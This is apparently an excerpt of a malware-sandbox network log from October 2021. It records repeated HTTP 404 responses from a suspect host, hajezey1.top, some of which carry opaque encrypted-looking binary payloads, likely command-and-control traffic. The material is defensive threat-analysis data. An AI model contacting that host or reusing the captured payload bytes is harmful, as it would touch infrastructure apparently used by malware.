15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 12 c3 b2 a5 83 41 ab 13 af b8 e8 81 63 a2 57 4a 60 87 bd 5f 6e 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 dc 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 9e 55 06 63 17 e5 ff dc fc be 1e b4 53 d9 63 ba 53 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OUcScS0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:56:04 GMTContent-Type: text/html; charset=utf-8Content-Length: 7Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 03 00 00 00 1d 3d 5d Data Ascii: =]
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:56:05 GMTContent-Type: text/html; charset=utf-8Content-Length: 42Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 07 9b 01 c2 40 9c e2 0f b3 66 f5 26 0a 5b 22 f9 6a 00 7e c2 5d 31 0e Data Ascii: Uys/~(`:@f&["j~]1
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:56:10 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:56:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 db fa 6a c6 86 04 12 fc 2a 54 e9 30 f6 c7 35 f3 73 07 03 d2 1f f9 d8 fa e0 b3 89 71 cd 37 33 33 d1 68 73 45 7c 1f 57 44 8d e8 be 3c 50 35 51 fe 08 22 b9 7f 18 66 3d 28 2a 87 6a dd d6 be db 43 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 57 2b 4d 9c 94 1b 7e 45 f7 ff 78 8d 55 db 24 0d 10 12 b4 1f eb 92 24 a6 4d c5 03 97 65 a3 61 7e de f5 36 9c 19 17 7e 4f af 9a a5 84 cb a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f4 96 be 25 51 61 9f d4 3f 7c 88 28 c8 48 6b 31 70 48 9a 07 fd ec 3f 36 7f ac 85 2f bd e0 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 c5 52 ce 4f 13 79 82 ae 9c f7 ad 4e 3d 79 ac f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 10 d3 fb 13 7f 11 bb d6 af 31 3c 27 